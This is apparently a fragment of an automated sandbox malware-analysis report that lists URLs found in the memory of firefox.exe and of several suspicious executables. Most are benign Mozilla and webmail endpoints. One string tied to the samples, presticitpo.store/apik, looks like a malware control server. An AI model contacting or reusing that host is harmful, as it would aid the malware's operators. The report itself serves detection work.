Source: firefox.exe, 0000001D.00000002.2992758898.000001E7637B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%Attempt
Source: firefox.exe, 0000001D.00000002.2992758898.000001E7637C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E76378A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2987595176.000001E762D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2976416417.000001E75FE21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FDD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource:///modules/BrowserContentHandler.sys.mjss
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource://gre/modules/handlers/HandlerList.sys.mj
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sCan
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sScheme
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2955106076.000001E752CD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.comtestPermissionFromPrincipalhttps://addons.mozilla.orghttps://screenshots.
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001D.00000002.3011405612.00002751D9304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store:443/apik
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/recordDataMigrationResult
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jscolor-mix(in
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelresource://gre/modules/PrivateBrowsingUtils.sys.
Source: file.exe, 00000000.00000003.1732680990.0000000005E71000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606378273.000000000580E000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2738826950.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2806986423.0000000005B10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/dispatchAsyncEvent/this._blockersPromi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3005403457.000001E764FC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/Exception
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2553620805.0000000029892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000003.1732680990.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008AF000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2269794608.000000001D6EC000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606378273.000000000580C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606825892.0000000005805000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2738826950.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2806986423.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005B07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: e192e43b61.exe, 0000000A.00000003.2606825892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000003.1732680990.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008AF000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2269794608.000000001D6EC000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606378273.000000000580C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606825892.0000000005805000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2738826950.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2806986423.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005B07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: e192e43b61.exe, 0000000A.00000003.2606825892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2868740203.000000000113A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E7637C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
